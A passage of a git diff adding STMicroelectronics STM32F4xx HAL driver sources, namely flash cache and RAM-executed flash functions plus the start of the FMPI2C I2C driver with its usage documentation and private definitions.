/* Enable instruction cache */ + __HAL_FLASH_INSTRUCTION_CACHE_ENABLE(); + } + + /* Flush data cache */ + if (READ_BIT(FLASH->ACR, FLASH_ACR_DCEN) != RESET) + { + /* Disable data cache */ + __HAL_FLASH_DATA_CACHE_DISABLE(); + /* Reset data cache */ + __HAL_FLASH_DATA_CACHE_RESET(); + /* Enable data cache */ + __HAL_FLASH_DATA_CACHE_ENABLE(); + } +} + +/** + * @} + */ + +#endif /* HAL_FLASH_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_flash_ramfunc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_flash_ramfunc.c new file mode 100644 index 000000000..12db458b5 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_flash_ramfunc.c @@ -0,0 +1,175 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_flash_ramfunc.c + * @author MCD Application Team + * @brief FLASH RAMFUNC module driver. + * This file provides a FLASH firmware functions which should be + * executed from internal SRAM + * + Stop/Start the flash interface while System Run + * + Enable/Disable the flash sleep while System Run + @verbatim + ============================================================================== + ##### APIs executed from Internal RAM ##### + ============================================================================== + [..] + *** ARM Compiler *** + -------------------- + [..] RAM functions are defined using the toolchain options. + Functions that are be executed in RAM should reside in a separate + source module. Using the 'Options for File' dialog you can simply change + the 'Code / Const' area of a module to a memory space in physical RAM. + Available memory areas are declared in the 'Target' tab of the + Options for Target' dialog. + + *** ICCARM Compiler *** + ----------------------- + [..] RAM functions are defined using a specific toolchain keyword "__ramfunc". + + *** GNU Compiler *** + -------------------- + [..] RAM functions are defined using a specific toolchain attribute + "__attribute__((section(".RamFunc")))". + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup FLASH_RAMFUNC FLASH RAMFUNC + * @brief FLASH functions executed from RAM + * @{ + */ +#ifdef HAL_FLASH_MODULE_ENABLED +#if defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) || defined(STM32F411xE) || defined(STM32F446xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || \ + defined(STM32F412Rx) || defined(STM32F412Cx) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ +/** @defgroup FLASH_RAMFUNC_Exported_Functions FLASH RAMFUNC Exported Functions + * @{ + */ + +/** @defgroup FLASH_RAMFUNC_Exported_Functions_Group1 Peripheral features functions executed from internal RAM + * @brief Peripheral Extended features functions + * +@verbatim + + =============================================================================== + ##### ramfunc functions ##### + =============================================================================== + [..] + This subsection provides a set of functions that should be executed from RAM + transfers. + +@endverbatim + * @{ + */ + +/** + * @brief Stop the flash interface while System Run + * @note This mode is only available for STM32F41xxx/STM32F446xx devices. + * @note This mode couldn't be set while executing with the flash itself. + * It should be done with specific routine executed from RAM. + * @retval HAL status + */ +__RAM_FUNC HAL_StatusTypeDef HAL_FLASHEx_StopFlashInterfaceClk(void) +{ + /* Enable Power ctrl clock */ + __HAL_RCC_PWR_CLK_ENABLE(); + /* Stop the flash interface while System Run */ + SET_BIT(PWR->CR, PWR_CR_FISSR); + + return HAL_OK; +} + +/** + * @brief Start the flash interface while System Run + * @note This mode is only available for STM32F411xx/STM32F446xx devices. + * @note This mode couldn't be set while executing with the flash itself. + * It should be done with specific routine executed from RAM. + * @retval HAL status + */ +__RAM_FUNC HAL_StatusTypeDef HAL_FLASHEx_StartFlashInterfaceClk(void) +{ + /* Enable Power ctrl clock */ + __HAL_RCC_PWR_CLK_ENABLE(); + /* Start the flash interface while System Run */ + CLEAR_BIT(PWR->CR, PWR_CR_FISSR); + + return HAL_OK; +} + +/** + * @brief Enable the flash sleep while System Run + * @note This mode is only available for STM32F41xxx/STM32F446xx devices. + * @note This mode could n't be set while executing with the flash itself. + * It should be done with specific routine executed from RAM. + * @retval HAL status + */ +__RAM_FUNC HAL_StatusTypeDef HAL_FLASHEx_EnableFlashSleepMode(void) +{ + /* Enable Power ctrl clock */ + __HAL_RCC_PWR_CLK_ENABLE(); + /* Enable the flash sleep while System Run */ + SET_BIT(PWR->CR, PWR_CR_FMSSR); + + return HAL_OK; +} + +/** + * @brief Disable the flash sleep while System Run + * @note This mode is only available for STM32F41xxx/STM32F446xx devices. + * @note This mode couldn't be set while executing with the flash itself. + * It should be done with specific routine executed from RAM. + * @retval HAL status + */ +__RAM_FUNC HAL_StatusTypeDef HAL_FLASHEx_DisableFlashSleepMode(void) +{ + /* Enable Power ctrl clock */ + __HAL_RCC_PWR_CLK_ENABLE(); + /* Disable the flash sleep while System Run */ + CLEAR_BIT(PWR->CR, PWR_CR_FMSSR); + + return HAL_OK; +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* STM32F410xx || STM32F411xE || STM32F446xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx */ +#endif /* HAL_FLASH_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpi2c.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpi2c.c new file mode 100644 index 000000000..306475925 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpi2c.c @@ -0,0 +1,6813 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_fmpi2c.c + * @author MCD Application Team + * @brief FMPI2C HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Inter Integrated Circuit (FMPI2C) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral State and Errors functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The FMPI2C HAL driver can be used as follows: + + (#) Declare a FMPI2C_HandleTypeDef handle structure, for example: + FMPI2C_HandleTypeDef hfmpi2c; + + (#)Initialize the FMPI2C low level resources by implementing the HAL_FMPI2C_MspInit() API: + (##) Enable the FMPI2Cx interface clock + (##) FMPI2C pins configuration + (+++) Enable the clock for the FMPI2C GPIOs + (+++) Configure FMPI2C pins as alternate function open-drain + (##) NVIC configuration if you need to use interrupt process + (+++) Configure the FMPI2Cx interrupt priority + (+++) Enable the NVIC FMPI2C IRQ Channel + (##) DMA Configuration if you need to use DMA process + (+++) Declare a DMA_HandleTypeDef handle structure for + the transmit or receive stream + (+++) Enable the DMAx interface clock using + (+++) Configure the DMA handle parameters + (+++) Configure the DMA Tx or Rx stream + (+++) Associate the initialized DMA handle to the hfmpi2c DMA Tx or Rx handle + (+++) Configure the priority and enable the NVIC for the transfer complete interrupt on + the DMA Tx or Rx stream + + (#) Configure the Communication Clock Timing, Own Address1, Master Addressing mode, Dual Addressing mode, + Own Address2, Own Address2 Mask, General call and Nostretch mode in the hfmpi2c Init structure. + + (#) Initialize the FMPI2C registers by calling the HAL_FMPI2C_Init(), configures also the low level Hardware + (GPIO, CLOCK, NVIC...etc) by calling the customized HAL_FMPI2C_MspInit(&hfmpi2c) API. + + (#) To check if target device is ready for communication, use the function HAL_FMPI2C_IsDeviceReady() + + (#) For FMPI2C IO and IO MEM operations, three operation modes are available within this driver : + + *** Polling mode IO operation *** + ================================= + [..] + (+) Transmit in master mode an amount of data in blocking mode using HAL_FMPI2C_Master_Transmit() + (+) Receive in master mode an amount of data in blocking mode using HAL_FMPI2C_Master_Receive() + (+) Transmit in slave mode an amount of data in blocking mode using HAL_FMPI2C_Slave_Transmit() + (+) Receive in slave mode an amount of data in blocking mode using HAL_FMPI2C_Slave_Receive() + + *** Polling mode IO MEM operation *** + ===================================== + [..] + (+) Write an amount of data in blocking mode to a specific memory address using HAL_FMPI2C_Mem_Write() + (+) Read an amount of data in blocking mode from a specific memory address using HAL_FMPI2C_Mem_Read() + + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Transmit in master mode an amount of data in non-blocking mode using HAL_FMPI2C_Master_Transmit_IT() + (+) At transmission end of transfer, HAL_FMPI2C_MasterTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MasterTxCpltCallback() + (+) Receive in master mode an amount of data in non-blocking mode using HAL_FMPI2C_Master_Receive_IT() + (+) At reception end of transfer, HAL_FMPI2C_MasterRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MasterRxCpltCallback() + (+) Transmit in slave mode an amount of data in non-blocking mode using HAL_FMPI2C_Slave_Transmit_IT() + (+) At transmission end of transfer, HAL_FMPI2C_SlaveTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_SlaveTxCpltCallback() + (+) Receive in slave mode an amount of data in non-blocking mode using HAL_FMPI2C_Slave_Receive_IT() + (+) At reception end of transfer, HAL_FMPI2C_SlaveRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_SlaveRxCpltCallback() + (+) In case of transfer Error, HAL_FMPI2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_ErrorCallback() + (+) Abort a master FMPI2C process communication with Interrupt using HAL_FMPI2C_Master_Abort_IT() + (+) End of abort process, HAL_FMPI2C_AbortCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_AbortCpltCallback() + (+) Discard a slave FMPI2C process communication using __HAL_FMPI2C_GENERATE_NACK() macro. + This action will inform Master to generate a Stop condition to discard the communication. + + + *** Interrupt mode or DMA mode IO sequential operation *** + ========================================================== + [..] + (@) These interfaces allow to manage a sequential transfer with a repeated start condition + when a direction change during transfer + [..] + (+) A specific option field manage the different steps of a sequential transfer + (+) Option field values are defined through FMPI2C_XFEROPTIONS and are listed below: + (++) FMPI2C_FIRST_AND_LAST_FRAME: No sequential usage, functional is same as associated interfaces in no sequential mode + (++) FMPI2C_FIRST_FRAME: Sequential usage, this option allow to manage a sequence with start condition, address + and data to transfer without a final stop condition + (++) FMPI2C_FIRST_AND_NEXT_FRAME: Sequential usage (Master only), this option allow to manage a sequence with start condition, address + and data to transfer without a final stop condition, an then permit a call the same master sequential interface + several times (like HAL_FMPI2C_Master_Seq_Transmit_IT() then HAL_FMPI2C_Master_Seq_Transmit_IT() + or HAL_FMPI2C_Master_Seq_Transmit_DMA() then HAL_FMPI2C_Master_Seq_Transmit_DMA()) + (++) FMPI2C_NEXT_FRAME: Sequential usage, this option allow to manage a sequence with a restart condition, address + and with new data to transfer if the direction change or manage only the new data to + transfer + if no direction change and without a final stop condition in both cases + (++) FMPI2C_LAST_FRAME: Sequential usage, this option allow to manage a sequance with a restart condition, address + and with new data to transfer if the direction change or manage only the new data to + transfer + if no direction change and with a final stop condition in both cases + (++) FMPI2C_LAST_FRAME_NO_STOP: Sequential usage (Master only), this option allow to manage a restart condition + after several call of the same master sequential interface several times + (link with option FMPI2C_FIRST_AND_NEXT_FRAME). + Usage can, transfer several bytes one by one using + HAL_FMPI2C_Master_Seq_Transmit_IT + or HAL_FMPI2C_Master_Seq_Receive_IT + or HAL_FMPI2C_Master_Seq_Transmit_DMA + or HAL_FMPI2C_Master_Seq_Receive_DMA + with option FMPI2C_FIRST_AND_NEXT_FRAME then FMPI2C_NEXT_FRAME. + Then usage of this option FMPI2C_LAST_FRAME_NO_STOP at the last Transmit or + Receive sequence permit to call the opposite interface Receive or Transmit + without stopping the communication and so generate a restart condition. + (++) FMPI2C_OTHER_FRAME: Sequential usage (Master only), this option allow to manage a restart condition after + each call of the same master sequential + interface. + Usage can, transfer several bytes one by one with a restart with slave address between + each bytes using + HAL_FMPI2C_Master_Seq_Transmit_IT + or HAL_FMPI2C_Master_Seq_Receive_IT + or HAL_FMPI2C_Master_Seq_Transmit_DMA + or HAL_FMPI2C_Master_Seq_Receive_DMA + with option FMPI2C_FIRST_FRAME then FMPI2C_OTHER_FRAME. + Then usage of this option FMPI2C_OTHER_AND_LAST_FRAME at the last frame to help automatic + generation of STOP condition. + + (+) Different sequential FMPI2C interfaces are listed below: + (++) Sequential transmit in master FMPI2C mode an amount of data in non-blocking mode using HAL_FMPI2C_Master_Seq_Transmit_IT() + or using HAL_FMPI2C_Master_Seq_Transmit_DMA() + (+++) At transmission end of current frame transfer, HAL_FMPI2C_MasterTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MasterTxCpltCallback() + (++) Sequential receive in master FMPI2C mode an amount of data in non-blocking mode using HAL_FMPI2C_Master_Seq_Receive_IT() + or using HAL_FMPI2C_Master_Seq_Receive_DMA() + (+++) At reception end of current frame transfer, HAL_FMPI2C_MasterRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MasterRxCpltCallback() + (++) Abort a master IT or DMA FMPI2C process communication with Interrupt using HAL_FMPI2C_Master_Abort_IT() + (+++) End of abort process, HAL_FMPI2C_AbortCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_AbortCpltCallback() + (++) Enable/disable the Address listen mode in slave FMPI2C mode using HAL_FMPI2C_EnableListen_IT() HAL_FMPI2C_DisableListen_IT() + (+++) When address slave FMPI2C match, HAL_FMPI2C_AddrCallback() is executed and user can + add his own code to check the Address Match Code and the transmission direction request by master (Write/Read). + (+++) At Listen mode end HAL_FMPI2C_ListenCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_ListenCpltCallback() + (++) Sequential transmit in slave FMPI2C mode an amount of data in non-blocking mode using HAL_FMPI2C_Slave_Seq_Transmit_IT() + or using HAL_FMPI2C_Slave_Seq_Transmit_DMA() + (+++) At transmission end of current frame transfer, HAL_FMPI2C_SlaveTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_SlaveTxCpltCallback() + (++) Sequential receive in slave FMPI2C mode an amount of data in non-blocking mode using HAL_FMPI2C_Slave_Seq_Receive_IT() + or using HAL_FMPI2C_Slave_Seq_Receive_DMA() + (+++) At reception end of current frame transfer, HAL_FMPI2C_SlaveRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_SlaveRxCpltCallback() + (++) In case of transfer Error, HAL_FMPI2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_ErrorCallback() + (++) Discard a slave FMPI2C process communication using __HAL_FMPI2C_GENERATE_NACK() macro. + This action will inform Master to generate a Stop condition to discard the communication. + + *** Interrupt mode IO MEM operation *** + ======================================= + [..] + (+) Write an amount of data in non-blocking mode with Interrupt to a specific memory address using + HAL_FMPI2C_Mem_Write_IT() + (+) At Memory end of write transfer, HAL_FMPI2C_MemTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MemTxCpltCallback() + (+) Read an amount of data in non-blocking mode with Interrupt from a specific memory address using + HAL_FMPI2C_Mem_Read_IT() + (+) At Memory end of read transfer, HAL_FMPI2C_MemRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MemRxCpltCallback() + (+) In case of transfer Error, HAL_FMPI2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_ErrorCallback() + + *** DMA mode IO operation *** + ============================== + [..] + (+) Transmit in master mode an amount of data in non-blocking mode (DMA) using + HAL_FMPI2C_Master_Transmit_DMA() + (+) At transmission end of transfer, HAL_FMPI2C_MasterTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MasterTxCpltCallback() + (+) Receive in master mode an amount of data in non-blocking mode (DMA) using + HAL_FMPI2C_Master_Receive_DMA() + (+) At reception end of transfer, HAL_FMPI2C_MasterRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MasterRxCpltCallback() + (+) Transmit in slave mode an amount of data in non-blocking mode (DMA) using + HAL_FMPI2C_Slave_Transmit_DMA() + (+) At transmission end of transfer, HAL_FMPI2C_SlaveTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_SlaveTxCpltCallback() + (+) Receive in slave mode an amount of data in non-blocking mode (DMA) using + HAL_FMPI2C_Slave_Receive_DMA() + (+) At reception end of transfer, HAL_FMPI2C_SlaveRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_SlaveRxCpltCallback() + (+) In case of transfer Error, HAL_FMPI2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_ErrorCallback() + (+) Abort a master FMPI2C process communication with Interrupt using HAL_FMPI2C_Master_Abort_IT() + (+) End of abort process, HAL_FMPI2C_AbortCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_AbortCpltCallback() + (+) Discard a slave FMPI2C process communication using __HAL_FMPI2C_GENERATE_NACK() macro. + This action will inform Master to generate a Stop condition to discard the communication. + + *** DMA mode IO MEM operation *** + ================================= + [..] + (+) Write an amount of data in non-blocking mode with DMA to a specific memory address using + HAL_FMPI2C_Mem_Write_DMA() + (+) At Memory end of write transfer, HAL_FMPI2C_MemTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MemTxCpltCallback() + (+) Read an amount of data in non-blocking mode with DMA from a specific memory address using + HAL_FMPI2C_Mem_Read_DMA() + (+) At Memory end of read transfer, HAL_FMPI2C_MemRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_MemRxCpltCallback() + (+) In case of transfer Error, HAL_FMPI2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_FMPI2C_ErrorCallback() + + + *** FMPI2C HAL driver macros list *** + ================================== + [..] + Below the list of most used macros in FMPI2C HAL driver. + + (+) __HAL_FMPI2C_ENABLE: Enable the FMPI2C peripheral + (+) __HAL_FMPI2C_DISABLE: Disable the FMPI2C peripheral + (+) __HAL_FMPI2C_GENERATE_NACK: Generate a Non-Acknowledge FMPI2C peripheral in Slave mode + (+) __HAL_FMPI2C_GET_FLAG: Check whether the specified FMPI2C flag is set or not + (+) __HAL_FMPI2C_CLEAR_FLAG: Clear the specified FMPI2C pending flag + (+) __HAL_FMPI2C_ENABLE_IT: Enable the specified FMPI2C interrupt + (+) __HAL_FMPI2C_DISABLE_IT: Disable the specified FMPI2C interrupt + + *** Callback registration *** + ============================================= + [..] + The compilation flag USE_HAL_FMPI2C_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Functions HAL_FMPI2C_RegisterCallback() or HAL_FMPI2C_RegisterAddrCallback() + to register an interrupt callback. + [..] + Function HAL_FMPI2C_RegisterCallback() allows to register following callbacks: + (+) MasterTxCpltCallback : callback for Master transmission end of transfer. + (+) MasterRxCpltCallback : callback for Master reception end of transfer. + (+) SlaveTxCpltCallback : callback for Slave transmission end of transfer. + (+) SlaveRxCpltCallback : callback for Slave reception end of transfer. + (+) ListenCpltCallback : callback for end of listen mode. + (+) MemTxCpltCallback : callback for Memory transmission end of transfer. + (+) MemRxCpltCallback : callback for Memory reception end of transfer. + (+) ErrorCallback : callback for error detection. + (+) AbortCpltCallback : callback for abort completion process. + (+) MspInitCallback : callback for Msp Init. + (+) MspDeInitCallback : callback for Msp DeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + [..] + For specific callback AddrCallback use dedicated register callbacks : HAL_FMPI2C_RegisterAddrCallback(). + [..] + Use function HAL_FMPI2C_UnRegisterCallback to reset a callback to the default + weak function. + HAL_FMPI2C_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) MasterTxCpltCallback : callback for Master transmission end of transfer. + (+) MasterRxCpltCallback : callback for Master reception end of transfer. + (+) SlaveTxCpltCallback : callback for Slave transmission end of transfer. + (+) SlaveRxCpltCallback : callback for Slave reception end of transfer. + (+) ListenCpltCallback : callback for end of listen mode. + (+) MemTxCpltCallback : callback for Memory transmission end of transfer. + (+) MemRxCpltCallback : callback for Memory reception end of transfer. + (+) ErrorCallback : callback for error detection. + (+) AbortCpltCallback : callback for abort completion process. + (+) MspInitCallback : callback for Msp Init. + (+) MspDeInitCallback : callback for Msp DeInit. + [..] + For callback AddrCallback use dedicated register callbacks : HAL_FMPI2C_UnRegisterAddrCallback(). + [..] + By default, after the HAL_FMPI2C_Init() and when the state is HAL_FMPI2C_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples HAL_FMPI2C_MasterTxCpltCallback(), HAL_FMPI2C_MasterRxCpltCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak functions in the HAL_FMPI2C_Init()/ HAL_FMPI2C_DeInit() only when + these callbacks are null (not registered beforehand). + If MspInit or MspDeInit are not null, the HAL_FMPI2C_Init()/ HAL_FMPI2C_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) whatever the state. + [..] + Callbacks can be registered/unregistered in HAL_FMPI2C_STATE_READY state only. + Exception done MspInit/MspDeInit functions that can be registered/unregistered + in HAL_FMPI2C_STATE_READY or HAL_FMPI2C_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + Then, the user first registers the MspInit/MspDeInit user callbacks + using HAL_FMPI2C_RegisterCallback() before calling HAL_FMPI2C_DeInit() + or HAL_FMPI2C_Init() function. + [..] + When the compilation flag USE_HAL_FMPI2C_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + [..] + (@) You can refer to the FMPI2C HAL driver header file for more useful macros + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup FMPI2C FMPI2C + * @brief FMPI2C HAL module driver + * @{ + */ + +#ifdef HAL_FMPI2C_MODULE_ENABLED +#if defined(FMPI2C_CR1_PE) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ + +/** @defgroup FMPI2C_Private_Define FMPI2C Private Define + * @{ + */ +#define TIMING_CLEAR_MASK (0xF0FFFFFFU) /*!< FMPI2C TIMING clear register Mask */ +#define FMPI2C_TIMEOUT_ADDR (10000U) /*!< 10 s */ +#define FMPI2C_TIMEOUT_BUSY (25U) /*!< 25 ms */ +#define FMPI2C_TIMEOUT_DIR (25U) /*!< 25 ms */ +#define FMPI2C_TIMEOUT_RXNE (25U) /*!< 25 ms */ +#define FMPI2C_TIMEOUT_STOPF (25U) /*!< 25 ms */ +#define FMPI2C_TIMEOUT_TC (25U) /*!< 25 ms */ +#define FMPI2C_TIMEOUT_TCR (25U) /*!< 25 ms */ +#define FMPI2C_TIMEOUT_TXIS (25U) /*!< 25 ms */ +#define FMPI2C_TIMEOUT_FLAG (25U) /*!< 25 ms */ + +#define MAX_NBYTE_SIZE 255U +#define SLAVE_ADDR_SHIFT 7U +#define SLAVE_ADDR_MSK 0x06U + +/* Private define for @ref PreviousState usage */ +#define FMPI2C_STATE_MSK ((uint32_t)((uint32_t)((uint32_t)HAL_FMPI2C_STATE_BUSY_TX | \ + (uint32_t)HAL_FMPI2C_STATE_BUSY_RX) & \ + (uint32_t)(~((uint32_t)HAL_FMPI2C_STATE_READY)))) +/*!< Mask State define, keep only RX and TX bits */ +#define FMPI2C_STATE_NONE ((uint32_t)(HAL_FMPI2C_MODE_NONE)) +/*!< Default Value */ +#define FMPI2C_STATE_MASTER_BUSY_TX ((uint32_t)(((uint32_t)HAL_FMPI2C_STATE_BUSY_TX & FMPI2C_STATE_MSK) | \ + (uint32_t)HAL_FMPI2C_MODE_MASTER)) +/*!< Master Busy TX, combinaison of State LSB and Mode enum */ +#define FMPI2C_STATE_MASTER_BUSY_RX ((uint32_t)(((uint32_t)HAL_FMPI2C_STATE_BUSY_RX & FMPI2C_STATE_MSK) | \ + (uint32_t)HAL_FMPI2C_MODE_MASTER)) +/*!< Master Busy RX, combinaison of State LSB and Mode enum */ +#define FMPI2C_STATE_SLAVE_BUSY_TX ((uint32_t)(((uint32_t)HAL_FMPI2C_STATE_BUSY_TX & FMPI2C_STATE_MSK) | \ + (uint32_t)HAL_FMPI2C_MODE_SLAVE)) +/*!< Slave Busy TX, combinaison of State LSB and Mode enum */ +#define FMPI2C_STATE_SLAVE_BUSY_RX ((uint32_t)(((uint32_t)HAL_FMPI2C_STATE_BUSY_RX & FMPI2C_STATE_MSK) | \ + (uint32_t)HAL_FMPI2C_MODE_SLAVE)) +/*!< Slave Busy RX, combinaison of State LSB and Mode enum */ +#define FMPI2C_STATE_MEM_BUSY_TX ((uint32_t)(((uint32_t)HAL_FMPI2C_STATE_BUSY_TX & FMPI2C_STATE_MSK) | \ + (uint32_t)HAL_FMPI2C_MODE_MEM)) +/*!< Memory Busy TX, combinaison of State LSB and Mode enum */ +#define FMPI2C_STATE_MEM_BUSY_RX ((uint32_t)(((uint32_t)HAL_FMPI2C_STATE_BUSY_RX & FMPI2C_STATE_MSK) | \ + (uint32_t)HAL_FMPI2C_MODE_MEM)) +/*!< Memory Busy RX, combinaison of State LSB and Mode enum */ + + +/* Private define to centralize the enable/disable of Interrupts */ +#define FMPI2C_XFER_TX_IT (uint16_t)(0x0001U) /*!< Bit field can be combinated with + @ref FMPI2C_XFER_LISTEN_IT */ +#define FMPI2C_XFER_RX_IT (uint16_t)(0x0002U) /*!< Bit field can be combinated with + @ref FMPI2C_XFER_LISTEN_IT */ +#define FMPI2C_XFER_LISTEN_IT (uint16_t)(0x8000U) /*!< Bit field can be combinated with @ref FMPI2C_XFER_TX_IT + and @ref FMPI2C_XFER_RX_IT */ + +#define FMPI2C_XFER_ERROR_IT (uint16_t)(0x0010U) /*!< Bit definition to manage addition of global Error + and NACK treatment */ +#define FMPI2C_XFER_CPLT_IT (uint16_t)(0x0020U) /*!< Bit definition to manage only STOP evenement */ +#define FMPI2C_XFER_RELOAD_IT (uint16_t)(0x0040U) /*!< Bit definition to manage only Reload of NBYTE */ + +/* Private define Sequential Transfer Options default/reset value */ +#define FMPI2C_NO_OPTION_FRAME (0xFFFF0000U) +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ + +/** @defgroup FMPI2C_Private_Functions FMPI2C Private Functions + * @{ + */ +/* Private functions to handle DMA transfer */ +static void FMPI2C_DMAMasterTransmitCplt(DMA_HandleTypeDef *hdma); +static void FMPI2C_DMAMasterReceiveCplt(DMA_HandleTypeDef *hdma); +static void FMPI2C_DMASlaveTransmitCplt(DMA_HandleTypeDef *hdma); +static void FMPI2C_DMASlaveReceiveCplt(DMA_HandleTypeDef *hdma); +static void FMPI2C_DMAError(DMA_HandleTypeDef *hdma); +static void FMPI2C_DMAAbort(DMA_HandleTypeDef *hdma); + +/* Private functions to handle IT transfer */ +static void FMPI2C_ITAddrCplt(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags); +static void FMPI2C_ITMasterSeqCplt(FMPI2C_HandleTypeDef *hfmpi2c); +static void FMPI2C_ITSlaveSeqCplt(FMPI2C_HandleTypeDef *hfmpi2c); +static void FMPI2C_ITMasterCplt(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags); +static void FMPI2C_ITSlaveCplt(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags); +static void FMPI2C_ITListenCplt(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags); +static void FMPI2C_ITError(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ErrorCode); + +/* Private functions to handle IT transfer */ +static HAL_StatusTypeDef FMPI2C_RequestMemoryWrite(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, + uint16_t MemAddress, uint16_t MemAddSize, uint32_t Timeout, + uint32_t Tickstart); +static HAL_StatusTypeDef FMPI2C_RequestMemoryRead(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, + uint16_t MemAddress, uint16_t MemAddSize, uint32_t Timeout, + uint32_t Tickstart); + +/* Private functions for FMPI2C transfer IRQ handler */ +static HAL_StatusTypeDef FMPI2C_Master_ISR_IT(struct __FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags, + uint32_t ITSources); +static HAL_StatusTypeDef FMPI2C_Slave_ISR_IT(struct __FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags, + uint32_t ITSources); +static HAL_StatusTypeDef FMPI2C_Master_ISR_DMA(struct __FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags, + uint32_t ITSources); +static HAL_StatusTypeDef FMPI2C_Slave_ISR_DMA(struct __FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags, + uint32_t ITSources); + +/* Private functions to handle flags during polling transfer */ +static HAL_StatusTypeDef FMPI2C_WaitOnFlagUntilTimeout(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Flag, FlagStatus Status, + uint32_t Timeout, uint32_t 